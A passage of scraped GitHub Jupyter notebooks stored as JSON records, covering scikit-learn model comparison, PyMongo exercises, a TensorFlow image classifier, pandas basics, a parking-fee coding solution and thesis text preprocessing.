cross_val_score\n\nscore=cross_val_score(LR,x,y)\nprint(score)\nprint(score.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_LR) - score.mean())*100)\n\nscore1=cross_val_score(RFR,x,y)\nprint(score1)\nprint(score1.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_RFR) - score1.mean())*100)\n\nscore2=cross_val_score(knn,x,y)\nprint(score2)\nprint(score2.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_knn) - score2.mean())*100)\n\nscore3=cross_val_score(GBR,x,y)\nprint(score3)\nprint(score3.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_GBR) - score3.mean())*100)\n\nscore4=cross_val_score(lasso,x,y)\nprint(score4)\nprint(score4.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_lasso) - score4.mean())*100)\n\nscore5=cross_val_score(rd,x,y)\nprint(score5)\nprint(score5.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_rd) - score5.mean())*100)\n\nscore6=cross_val_score(dtr,x,y)\nprint(score6)\nprint(score6.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_DTR) - score6.mean())*100)\n\nscore7=cross_val_score(svr,x,y)\nprint(score7)\nprint(score7.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_SVR) - score7.mean())*100)\n\nscore8=cross_val_score(etr,x,y)\nprint(score8)\nprint(score8.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_ETR) - score8.mean())*100)\n\n# On the basis of cross validation score and difference between R2 and Cross Score - ExtraTreesRegressor is the best model to fit the Data\n\nfrom sklearn.model_selection import GridSearchCV\n\nparam={\"n_estimators\":[100],\"criterion\":['squared_error','absolute_error','friedman_mse','poisson'],\"min_samples_split\":[2,4,6],\"min_samples_leaf\":[1,2,3,4], \"min_weight_fraction_leaf\":[0.0, 1.0, 2.0]}\n\ngscv=GridSearchCV(ExtraTreesRegressor(), param, cv=5)\n\ngscv.fit(x_train,y_train)\n\ngscv.best_params_\n\nModel=ExtraTreesRegressor(criterion= 'friedman_mse',min_samples_leaf= 1,min_samples_split= 4,min_weight_fraction_leaf= 0.0, n_estimators= 10)\n\nModel.fit(x_train,y_train)\npred=Model.predict(x_test)\nprint(\"R2_score\", r2_score(y_test,pred))\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred)))\n\nimport pickle\nfilename=\"StudentGrades.report\"\npickle.dump(Model, open(filename, \"wb\"))\n\nimport pickle\nloaded_model=pickle.load(open(\"StudentGrades.report\",\"rb\"))\nresult=loaded_model.score(x_test,y_test)\nprint(result*100)\n\nconclusion=pd.DataFrame([loaded_model.predict(x_test)[:],y_test[:]],index=[\"Predicted\",\"Original\"])\nconclusion\n\n# On the basis of cross validation score and difference between R2 and Cross Score -ExtraTreesRegressor is the best model to fit the Data R2 score of test model is 95.15\n\n\n","repo_name":"geeta2301/Practice-project","sub_path":"Students_grades_project.ipynb","file_name":"Students_grades_project.ipynb","file_ext":"py","file_size_in_byte":10899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} 
+{"seq_id":"72882723275","text":"# ## 1. Accessing MongoDB Database and printing database names\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\n\ndbs = client.list_database_names()\nfor i in dbs:\n print(i)\nclient.close()\n# -\n\n# ## 2. Printing collections from within the database\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\n\ndb = client['test_info']\ncoll = db['fruit']\n\ndb.list_collection_names()\n# -\n\n# ## 3. Inserting Data\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\n\ndb = client['test_info']\ncoll = db['fruit']\n\nresult = coll.insert_one({'name': 'hello', 'qty':321})\nprint(result.inserted_id)\n\n# +\nimport json\nfrom pymongo import MongoClient\n\nmyfile = open(r'Restaurants\\intern.json','r')\n\nfileLines= myfile.readlines()\nfileString = ''\n\nfor i in fileLines:\n i.strip('\\n')\n i.strip('\\t')\n fileString += i\n\ninternDictionary = json.loads(fileString)\ninternDictionary = internDictionary['intern_details']\n\nprint(internDictionary)\n\nprint(type(internDictionary))\n\nclient = MongoClient('localhost', 27017)\ndb = client['test_info']\ncoll = db['person']\nx = coll.insert_many(internDictionary)\nprint(x.inserted_ids)\n# -\n\n# ## 4. Data Querying\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient(\"localhost\", 27017)\n\ndb = client['test_info']\ncoll = db['fruit']\n\nquery = {'name':{'$regex':'an'}, 'qty':{'$gte':20}}\nquery = {'address.coords.0':1.3042}\nprojection ={'_id':0}\n\nx = coll.find(query, projection)\nfor i in x:\n print(i)\n# -\n\n# ## 5. Updating Data (Set)\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost',27017)\n\ndb = client['test_info']\nprint(db.list_collection_names())\ncoll = db['fruits']\n\nquery = {'name':'together'}\nproj = {'$set':{'name':'applebananatogether'}}\n\nx = coll.update_many(query, proj)\nprint(x.modified_count)\n# for i in x:\n# print(i)\n\n\nclient.close()\n# -\n\n# ## 6. Sorting\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\n\ndb = client['test_info']\ncoll = db['fruit']\n\nquery = {'qty':{'$exists':True}, 'country':{'$exists':False}}\nproj = {'_id':0, 'address':0}\n\nx = coll.find(query, proj).sort('name',-1)\n# The negative 1 makes the sort sorted in reverse alphabetical\nfor i in x:\n print(i)\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\n\ndb = client['test_info']\ncoll = db['fruit']\n\n#remember thisssssss\nquery = {'$or':[{'name':'hello'}, {'name':'durian'}]}\nquery = {'name':{'$in':['hello', 'orange']}}\nquery = {'name':{'$in':['hello', 'orange']}}\nquery = {\"qty\":{\"$not\":{\"$gt\":10}}}\n\nprojection = {'_id':0}\n\nx = coll.find(query, projection)\nfor i in x: \n print(i)\n# -\n\n# ## 7. Misc:\n\n# +\n# useful one-liner python scripts\nwith open('test.txt', 'r') as file: lines = file.readlines()\nlines = [i.strip('\\n') for i in lines]\nprint(lines)\n\nalphabets = [chr(i) for i in range(65,91)]\nprint(alphabets)\n","repo_name":"darentanrw/h2computing-public","sub_path":"6. 
NoSQL (PyMongo)/Pymongo Detailed Revision v2.ipynb","file_name":"Pymongo Detailed Revision v2.ipynb","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"36006245119","text":"# + id=\"L1WtoaOHVrVh\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport PIL\nimport tensorflow as tf\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Sequential\n\n# + [markdown] id=\"xyDNn9MbIzfT\"\n# ### Create a dataset\n\n# + [markdown] id=\"anqiK_AGI086\"\n# Define some parameters for the loader:\n\n# + id=\"H74l2DoDI2XD\"\nbatch_size = 32\nimg_height = 180\nimg_width = 180\ndata_dir = './Imgs/'\n\n# + [markdown] id=\"pFBhRrrEI49z\"\n# It's good practice to use a validation split when developing your model. Use 80% of the images for training and 20% for validation.\n\n# + id=\"fIR0kRZiI_AT\"\ntrain_ds = tf.keras.utils.image_dataset_from_directory(\n data_dir+'train',\n # validation_split=0.2,\n # subset=\"training\",\n # seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n\n# + id=\"iscU3UoVJBXj\"\nval_ds = tf.keras.utils.image_dataset_from_directory(\n data_dir+'val',\n # validation_split=0.2,\n # subset=\"validation\",\n # seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n# -\n\ntest_ds = tf.keras.utils.image_dataset_from_directory(\n data_dir+'test',\n # validation_split=0.2,\n # subset=\"validation\",\n # seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n\n# + [markdown] id=\"WLQULyAvJC3X\"\n# You can find the class names in the `class_names` attribute on these datasets. These correspond to the directory names in alphabetical order.\n\n# + id=\"ZHAxkHX5JD3k\"\nclass_names = train_ds.class_names\nprint(class_names)\n\n# + [markdown] id=\"_uoVvxSLJW9m\"\n# ## Visualize the data\n#\n# Here are the first nine images from the training dataset:\n\n# + id=\"wBmEA9c0JYes\"\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(10, 10))\nfor images, labels in train_ds.take(1):\n for i in range(9):\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(images[i].numpy().astype(\"uint8\"))\n plt.title(class_names[labels[i]])\n plt.axis(\"off\")\n\n# + [markdown] id=\"5M6BXtXFJdW0\"\n# You will pass these datasets to the Keras `Model.fit` method for training later in this tutorial. If you like, you can also manually iterate over the dataset and retrieve batches of images:\n\n# + id=\"2-MfMoenJi8s\"\nfor image_batch, labels_batch in train_ds:\n print(image_batch.shape)\n print(labels_batch.shape)\n break\n\n# + [markdown] id=\"Wj4FrKxxJkoW\"\n# The `image_batch` is a tensor of the shape `(32, 180, 180, 3)`. This is a batch of 32 images of shape `180x180x3` (the last dimension refers to color channels RGB). The `label_batch` is a tensor of the shape `(32,)`, these are corresponding labels to the 32 images.\n#\n# You can call `.numpy()` on the `image_batch` and `labels_batch` tensors to convert them to a `numpy.ndarray`.\n#\n\n# + [markdown] id=\"4Dr0at41KcAU\"\n# ## Configure the dataset for performance\n#\n# Make sure to use buffered prefetching, so you can yield data from disk without having I/O become blocking. These are two important methods you should use when loading data:\n#\n# - `Dataset.cache` keeps the images in memory after they're loaded off disk during the first epoch. This will ensure the dataset does not become a bottleneck while training your model. 
If your dataset is too large to fit into memory, you can also use this method to create a performant on-disk cache.\n# - `Dataset.prefetch` overlaps data preprocessing and model execution while training.\n#\n# Interested readers can learn more about both methods, as well as how to cache data to disk in the *Prefetching* section of the [Better performance with the tf.data API](../../guide/data_performance.ipynb) guide.\n\n# + id=\"nOjJSm7DKoZA\"\nAUTOTUNE = tf.data.AUTOTUNE\n\ntrain_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)\nval_ds = val_ds.cache().prefetch(buffer_size=AUTOTUNE)\ntest_ds = test_ds.cache().prefetch(buffer_size=AUTOTUNE)\n\n# + [markdown] id=\"8GUnmPF4JvEf\"\n# ## Standardize the data\n\n# + [markdown] id=\"e56VXHMWJxYT\"\n# The RGB channel values are in the `[0, 255]` range. This is not ideal for a neural network; in general you should seek to make your input values small.\n#\n# Here, you will standardize values to be in the `[0, 1]` range by using `tf.keras.layers.Rescaling`:\n\n# + id=\"PEYxo2CTJvY9\"\nnormalization_layer = layers.Rescaling(1./255)\n\n# + [markdown] id=\"Bl4RmanbJ4g0\"\n# There are two ways to use this layer. You can apply it to the dataset by calling `Dataset.map`:\n\n# + id=\"X9o9ESaJJ502\"\nnormalized_ds = train_ds.map(lambda x, y: (normalization_layer(x), y))\nimage_batch, labels_batch = next(iter(normalized_ds))\nfirst_image = image_batch[0]\n# Notice the pixel values are now in `[0,1]`.\nprint(np.min(first_image), np.max(first_image))\n\n# + [markdown] id=\"XWEOmRSBJ9J8\"\n# Or, you can include the layer inside your model definition, which can simplify deployment. Use the second approach here.\n\n# + [markdown] id=\"XsRk1xCwKZR4\"\n# Note: You previously resized images using the `image_size` argument of `tf.keras.utils.image_dataset_from_directory`. If you want to include the resizing logic in your model as well, you can use the `tf.keras.layers.Resizing` layer.\n\n# + [markdown] id=\"hO_jT7HwMrEn\"\n# The plots show that training accuracy and validation accuracy are off by large margins, and the model has achieved only around 60% accuracy on the validation set.\n#\n# The following tutorial sections show how to inspect what went wrong and try to increase the overall performance of the model.\n\n# + [markdown] id=\"hqtyGodAMvNV\"\n# ## Overfitting\n\n# + [markdown] id=\"ixsz9XFfMxcu\"\n# In the plots above, the training accuracy is increasing linearly over time, whereas validation accuracy stalls around 60% in the training process. Also, the difference in accuracy between training and validation accuracy is noticeable—a sign of [overfitting](https://www.tensorflow.org/tutorials/keras/overfit_and_underfit).\n#\n# When there are a small number of training examples, the model sometimes learns from noises or unwanted details from training examples—to an extent that it negatively impacts the performance of the model on new examples. This phenomenon is known as overfitting. It means that the model will have a difficult time generalizing on a new dataset.\n#\n# There are multiple ways to fight overfitting in the training process. In this tutorial, you'll use *data augmentation* and add *dropout* to your model.\n\n# + [markdown] id=\"BDMfYqwmM1C-\"\n# ## Data augmentation\n\n# + [markdown] id=\"GxYwix81M2YO\"\n# Overfitting generally occurs when there are a small number of training examples. 
[Data augmentation](./data_augmentation.ipynb) takes the approach of generating additional training data from your existing examples by augmenting them using random transformations that yield believable-looking images. This helps expose the model to more aspects of the data and generalize better.\n#\n# You will implement data augmentation using the following Keras preprocessing layers: `tf.keras.layers.RandomFlip`, `tf.keras.layers.RandomRotation`, and `tf.keras.layers.RandomZoom`. These can be included inside your model like other layers, and run on the GPU.\n\n# + id=\"9J80BAbIMs21\"\ndata_augmentation = keras.Sequential(\n [\n layers.RandomFlip(\"horizontal\",\n input_shape=(img_height,\n img_width,\n 3)),\n layers.RandomRotation(0.1),\n layers.RandomZoom(0.1),\n ]\n)\n\n# + [markdown] id=\"PN4k1dK3S6eV\"\n# Visualize a few augmented examples by applying data augmentation to the same image several times:\n\n# + id=\"7Z90k539S838\"\nplt.figure(figsize=(10, 10))\nfor images, _ in train_ds.take(1):\n for i in range(9):\n augmented_images = data_augmentation(images)\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(augmented_images[0].numpy().astype(\"uint8\"))\n plt.axis(\"off\")\n\n# + [markdown] id=\"tsjXCBLYYNs5\"\n# You will add data augmentation to your model before training in the next step.\n\n# + [markdown] id=\"ZeD3bXepYKXs\"\n# ## Dropout\n#\n# Another technique to reduce overfitting is to introduce [dropout](https://developers.google.com/machine-learning/glossary#dropout_regularization){:.external} regularization to the network.\n#\n# When you apply dropout to a layer, it randomly drops out (by setting the activation to zero) a number of output units from the layer during the training process. Dropout takes a fractional number as its input value, in the form such as 0.1, 0.2, 0.4, etc. 
This means dropping out 10%, 20% or 40% of the output units randomly from the applied layer.\n#\n# Create a new neural network with `tf.keras.layers.Dropout` before training it using the augmented images:\n\n# + id=\"2Zeg8zsqXCsm\"\n\nclass_names = train_ds.class_names\nnum_classes = len(class_names)\nmodel = Sequential([\n data_augmentation,\n layers.Rescaling(1./255),\n layers.Conv2D(16, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(32, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(64, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Dropout(0.2),\n layers.Flatten(),\n layers.Dense(128, activation='relu'),\n layers.Dense(num_classes, name=\"outputs\")\n])\n\n# + [markdown] id=\"L4nEcuqgZLbi\"\n# ## Compile and train the model\n\n# + id=\"EvyAINs9ZOmJ\"\nmodel.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n# + id=\"wWLkKoKjZSoC\"\nmodel.summary()\n\n# + id=\"LWS-vvNaZDag\"\nepochs = 15\nhistory = model.fit(\n train_ds,\n validation_data=val_ds,\n epochs=epochs\n)\n\n# + [markdown] id=\"Lkdl8VsBbZOu\"\n# ## Visualize training results\n#\n# After applying data augmentation and `tf.keras.layers.Dropout`, there is less overfitting than before, and training and validation accuracy are closer aligned:\n\n# + id=\"dduoLfKsZVIA\"\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs_range = range(epochs)\n\nplt.figure(figsize=(8, 8))\nplt.subplot(1, 2, 1)\nplt.plot(epochs_range, acc, label='Training Accuracy')\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(1, 2, 2)\nplt.plot(epochs_range, loss, label='Training Loss')\nplt.plot(epochs_range, val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.title('Training and Validation Loss')\nplt.show()\n\n# + [markdown] id=\"dtv5VbaVb-3W\"\n# ## Predict on new data\n\n# + [markdown] id=\"10buWpJbcCQz\"\n# Use your model to classify an image that wasn't included in the training or validation sets.\n\n# + [markdown] id=\"NKgMZ4bDcHf7\"\n# Note: Data augmentation and dropout layers are inactive at inference time.\n\n# + id=\"dC40sRITBSsQ\"\n# sunflower_url = \"https://storage.googleapis.com/download.tensorflow.org/example_images/592px-Red_sunflower.jpg\"\n# sunflower_path = tf.keras.utils.get_file('Red_sunflower', origin=sunflower_url)\n\n# img = tf.keras.utils.load_img(\n# sunflower_path, target_size=(img_height, img_width)\n# )\n# img_array = tf.keras.utils.img_to_array(img)\n# img_array = tf.expand_dims(next(iter(test_ds)), 0) # Create a batch\n# img_array\n\npredictions = model.predict(test_ds)\nscore = tf.nn.softmax(predictions[0])\n\nprint(\n \"This image most likely belongs to {} with a {:.2f} percent confidence.\"\n .format(class_names[np.argmax(score)], 100 * np.max(score))\n)\n","repo_name":"Namasivaayam-L/DeepLearningLab","sub_path":"5Ex/Refs/classification.ipynb","file_name":"classification.ipynb","file_ext":"py","file_size_in_byte":11352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"5945487133","text":"# +\nimport pandas as pd\nimport numpy as np\n\nprint(pd.__version__)\nprint(np.__version__)\n# -\n\n# NaN adalah missing value\ndata = {'A':[15,15,18,np.nan,12],\n 
'B':[15,15,18,np.nan,12]}\ndf = pd.DataFrame(data)\ndf\n\ndf['A']\n\n#setiap kolom pada pandas adalah type data series (1 dimensi), sedangkan kumpulan series adalah dataframe.\ntype(df['A'])\n\ntype(df)\n\n#tidak disarankan\n#membandingkan antar series atau kolom\ndf['A'] == df['B']\n\n#disarankan\ndf['A'].equals(df['B'])\n\n# +\n#membandingkan antar dataframe\ndf1 = df.copy(deep=True)\n\ndf.equals(df1)\n# -\n\ndf == df1\n\n\n","repo_name":"MuhFaridanSutariya/learn-pandas","sub_path":"07 compare each column and dataframe.ipynb","file_name":"07 compare each column and dataframe.ipynb","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"16582360367","text":"# +\nimport math\n\ndef change(t):\n tt,mi = t.split(\":\")\n tmp = int(tt)*60 + int(mi)\n return tmp\n\ndef solution(fees, records):\n\n dic1 = {}\n result = []\n aa = []\n\n for record in records:\n time,num,condi = record.split()\n dic1[num] = []\n\n for record in records:\n time,num,condi = record.split()\n dic1[num].append((time,condi))\n\n for i in sorted(list(dic1.items())):\n temp = 0\n if len(i[1]) % 2 == 0:\n for j in range(0,len(i[1]),2):\n temp += change(i[1][j+1][0]) - change(i[1][j][0])\n aa.append(temp)\n else:\n for k in range(0,len(i[1][:-1]),2):\n temp += change(i[1][k+1][0]) - change(i[1][k][0])\n temp += 1439 - change(i[1][-1][0])\n aa.append(temp)\n\n for a in aa:\n if a <= fees[0]:\n result.append(fees[1])\n else:\n temp_ = fees[1] + math.ceil((a-fees[0])/fees[2]) * fees[3]\n result.append(temp_)\n return result\n","repo_name":"886814/Algorithm","sub_path":"2022 카카오 블라인드/주차 요금 계산.ipynb","file_name":"주차 요금 계산.ipynb","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"12777255840","text":"import time\nstart_time = time.time()\n\n# Import needed packages\nimport os\nimport pandas as pd\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nfrom sklearn.preprocessing import KBinsDiscretizer\nimport seaborn as sns; sns.set()\nimport glob\nfrom sklearn.linear_model import LinearRegression\nfrom statsmodels.formula.api import ols\nimport re\nimport nltk\nfrom langdetect import detect\nfrom sklearn import feature_extraction, model_selection, naive_bayes, pipeline, manifold, preprocessing\nfrom lime import lime_text\nimport gensim\nimport gensim.downloader as gensim_api\nfrom tensorflow.keras import models, layers, preprocessing as kprocessing\nfrom tensorflow.keras import backend as K\nimport transformers\nplt.style.use('seaborn-whitegrid')\nsns.set_style(\"whitegrid\")\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.stem.snowball import EnglishStemmer\nimport spacy\nfrom spacy import displacy\nfrom wordcloud import WordCloud\nfrom sklearn.preprocessing import KBinsDiscretizer\nfrom nbpep8.nbpep8 import pep8\n\n\n# # 1. 
Load the data\n\n#Set the working directory\nos.chdir('C:\\\\Users\\\\piotr\\\\OneDrive - Erasmus University Rotterdam\\\\Thesis\\\\')\n# #Load the data\nmerged_df = pd.read_csv('Master Thesis Data\\\\merged_df.csv')\n\n# Possible speed improvements \n#\n# - drop the longest questions\n#\n# - drop the columns that are not needed (answer body)\n\n# ## 1.1 Create text df with Post_Body only\n\n# +\n# ## Create text df with Post_Body and index only\n# text_df = merged_df[['Post_Body']]\n\n# +\n# text_df.to_csv('Master Thesis Data\\\\text_df.csv', index=True)\n\n# +\n# ## Create unprocessed_df with other columns than Post_Body\n# unprocessed_df = merged_df.drop(['Post_Body'], axis=1)\n\n# +\n# unprocessed_df.to_csv('Master Thesis Data\\\\unprocessed_df.csv', index=True)\n# -\n\n#Read the text_df\ntext_df = pd.read_csv('Master Thesis Data\\\\text_df.csv')\n\n#Read the unprocessed_df\nunprocessed_df = pd.read_csv('Master Thesis Data\\\\unprocessed_df.csv')\n\n\n# +\n# #See if the data frames can be merged\n# validation_df = pd.merge(text_df, unprocessed_df, on='Unnamed: 0')\n# -\n\n# ## 2. Remove the html tags and other chunks of code\n\n# Remove the html tags and the content between them\n\ndef remove_code(x):\n \"\"\"Function based on the Beautifulsoup library intended to replace \n the content of all the tags of a text specified as a parameter.\n\n Parameters\n ----------------------------------------\n x : string\n Sequence of characters to modify.\n ----------------------------------------\n \"\"\"\n soup = BeautifulSoup(x,\"lxml\")\n code_to_remove = soup.findAll(\"code\")\n for code in code_to_remove:\n code.replace_with(\" \")\n return str(soup)\n\n\n# The data set is too large to be processed at once, so it will be processed in chunks \n\n# +\nchunksize = 10 ** 4\nfirst_one = True\nfilepath = os.path.join('Master Thesis Data', 'text_df.csv') \n\nfor chunk in pd.read_csv(filepath, chunksize=chunksize):\n chunk.loc[:, 'Post_Body'] = chunk['Post_Body'].apply(remove_code)\n chunk.loc[:, 'Post_Body'] = chunk['Post_Body'].apply(lambda x: BeautifulSoup(x, \"lxml\").get_text())\n \n # If it's the first chunk we're processing, we want to write to a new file with the header\n if first_one:\n chunk.to_csv('Master Thesis Data\\\\text_df_clean.csv', mode='w', index=False)\n first_one = False\n # Otherwise, we want to append to the existing file, and we don't want to write the header again\n else:\n chunk.to_csv('Master Thesis Data\\\\text_df_clean.csv', mode='a', index=False, header=False)\n\n# -\n\ntext_df_clean.shape\n\n#Read text_df_clean\ntext_df_clean = pd.read_csv('Master Thesis Data\\\\text_df_clean.csv')\n\n# +\n# #Load the data again after removing code\n# merged_df = pd.read_csv('Master Thesis Data\\\\merged_df_clean.csv')\n# -\n\n# ## 3. Remove languages other than English\n\n# Now we need to check whether the texts of the questions are written in different languages. 
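\n\n# Side note (an added illustration, not part of the original pipeline): langdetect is non-deterministic on short or ambiguous text unless a seed is fixed, and it raises an exception on empty strings, which is why the helper below wraps detect() in a try/except. A small check:\nfrom langdetect import detect, DetectorFactory\nDetectorFactory.seed = 0  # fix the random seed so repeated calls give stable results on borderline text\nprint(detect('This question is about a Python error'))  # expected output: 'en'\n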
\n\n# +\n# merged_df['Post_Body']\n\n# +\n# Create feature \"lang\" with langdetect library\nfrom langdetect import detect\n\ndef detect_lang(x):\n try:\n return detect(x)\n except:\n return 'unknown' # instead of pass\n\n\n# +\nimport pandas as pd\nimport os\nimport time\nfrom bs4 import BeautifulSoup\nfrom langdetect import detect\n\nchunksize = 10 ** 5\nfirst_one = True\nstart_chunk = 28 # 0-indexed, adjust this to the chunk where you want to start\n\ninput_filepath = os.path.join('Master Thesis Data', 'text_df_clean.csv') \noutput_filepath = os.path.join('Master Thesis Data', 'text_df_clean_3.csv') # output to a new file\n\n# Get the total number of rows in the file\ntotal_rows = sum(1 for row in open(input_filepath)) - 1 # Subtract 1 to account for the header\n\nstart = time.time()\n\nskiprows = range(1, start_chunk * chunksize + 1) # Calculate the rows to skip based on the start_chunk\n\nfor i, chunk in enumerate(pd.read_csv(input_filepath, skiprows=skiprows, chunksize=chunksize, header=0)):\n chunk.loc[:,'short_Post_Body'] = chunk['Post_Body'].apply(lambda x: x[0:100] if isinstance(x, str) else x)\n chunk.loc[:,'lang'] = chunk['short_Post_Body'].apply(detect_lang)\n \n # If it's the first chunk we're processing, we want to write to a new file with the header\n if first_one:\n chunk.to_csv(output_filepath, mode='w', index=False)\n first_one = False\n # Otherwise, we want to append to the existing file, and we don't want to write the header again\n else:\n chunk.to_csv(output_filepath, mode='a', index=False, header=False)\n \n # Estimate remaining time\n elapsed_time = time.time() - start\n rows_processed = chunksize * (i + 1)\n print(f\"Processed {rows_processed} rows in {elapsed_time:.2f} seconds.\")\n \n if rows_processed < total_rows:\n remaining_rows = total_rows - rows_processed\n remaining_chunks = -(-remaining_rows // chunksize) # Ceiling division\n estimated_time = (elapsed_time / rows_processed) * remaining_rows\n print(f\"Estimated remaining time: {estimated_time:.2f} seconds or approximately {estimated_time/60:.2f} minutes.\")\n\n# -\n\n#Read text_df_clean_2\ntext_df_clean_2 = pd.read_csv('Master Thesis Data\\\\text_df_clean_2.csv')\ntext_df_clean_2\n\n#Read text_df_clean_3\ntext_df_clean_3 = pd.read_csv('Master Thesis Data\\\\text_df_clean_3.csv')\ntext_df_clean_3\n\n#Concatenate text_df_clean_2 and text_df_clean_3\ntext_df_clean_2 = pd.concat([text_df_clean_2, text_df_clean_3], axis=0)\ntext_df_clean_2\n\npd.DataFrame(text_df_clean_2.lang.value_counts())\n\n# The majority of the posts are in English, so we are gonna remove posts in other languages. 
We lose only 134366 body texts\n\n#Number of posts in language other than English\nprint(3040730 - 2906364)\n\n# Deletion of data that is not in the English language\ntext_df_clean_2 = text_df_clean_2[text_df_clean_2['lang']=='en']\n\ntext_df_clean_2.shape\n\n#Drop the short_Post_Body and lang columns\ntext_df_clean_2 = text_df_clean_2.drop(['short_Post_Body', 'lang'], axis=1)\n\n#Write down text_df_clean_2\ntext_df_clean_2.to_csv('Master Thesis Data\\\\text_df_clean_2.csv', index=False)\n\n'''\nPreprocess a string.\n:parameter\n :param text: string - name of column containing text\n :param lst_stopwords: list - list of stopwords to remove\n :param flg_stemm: bool - whether stemming is to be applied\n :param flg_lemm: bool - whether lemmitisation is to be applied\n:return\n cleaned text\n'''\ndef utils_preprocess_text(text, flg_stemm=False, flg_lemm=True, lst_stopwords=None):\n ## clean (convert to lowercase and remove punctuations and \n #characters and then strip)\n text = re.sub(r'[^\\w\\s]', '', str(text).lower().strip())\n \n ## Tokenize (convert from string to list)\n lst_text = text.split()\n ## remove Stopwords\n if lst_stopwords is not None:\n lst_text = [word for word in lst_text if word not in \n lst_stopwords]\n \n ## Stemming (remove -ing, -ly, ...)\n if flg_stemm == True:\n ps = nltk.stem.porter.PorterStemmer()\n lst_text = [ps.stem(word) for word in lst_text]\n \n ## Lemmatisation (convert the word into root word)\n if flg_lemm == True:\n lem = nltk.stem.wordnet.WordNetLemmatizer()\n lst_text = [lem.lemmatize(word) for word in lst_text]\n \n ## back to string from list\n text = \" \".join(lst_text)\n return text\n\n\nlst_stopwords = nltk.corpus.stopwords.words(\"english\")\n\n# +\nimport pandas as pd\nimport os\nimport time\n\nchunksize = 10 ** 5\nfirst_one = True\n\ninput_filepath = os.path.join('Master Thesis Data', 'text_df_clean_2.csv') \noutput_filepath = os.path.join('Master Thesis Data', 'processed_df.csv') \n\n# Get the total number of rows in the file\ntotal_rows = sum(1 for row in open(input_filepath)) - 1 # Subtract 1 to account for the header\n\nstart = time.time()\n\nfor i, chunk in enumerate(pd.read_csv(input_filepath, chunksize=chunksize)):\n chunk['Post_Body_clean'] = chunk['Post_Body'].apply(lambda x: utils_preprocess_text(x, flg_stemm=False, flg_lemm=True, lst_stopwords=lst_stopwords))\n \n # If it's the first chunk we're processing, we want to write to a new file with the header\n if first_one:\n chunk.to_csv(output_filepath, mode='w', index=False)\n first_one = False\n # Otherwise, we want to append to the existing file, and we don't want to write the header again\n else:\n chunk.to_csv(output_filepath, mode='a', index=False, header=False)\n \n # Estimate remaining time\n elapsed_time = time.time() - start\n rows_processed = chunksize * (i + 1)\n print(f\"Processed {rows_processed} rows in {elapsed_time:.2f} seconds.\")\n \n if rows_processed < total_rows:\n remaining_rows = total_rows - rows_processed\n remaining_chunks = -(-remaining_rows // chunksize) # Ceiling division\n estimated_time = (elapsed_time / rows_processed) * remaining_rows\n print(f\"Estimated remaining time: {estimated_time:.2f} seconds or approximately {estimated_time/60:.2f} minutes.\")\n\n# -\n\n#read processed_df\nprocessed_df = pd.read_csv('Master Thesis Data\\\\processed_df.csv')\nprocessed_df\n\n# +\n# #drop Post_Body column\n# processed_df = processed_df.drop(['Post_Body'], axis=1)\n# -\n\n#merge processed_df with text_df (left join on Unnamed: 0)\ndf_clean = 
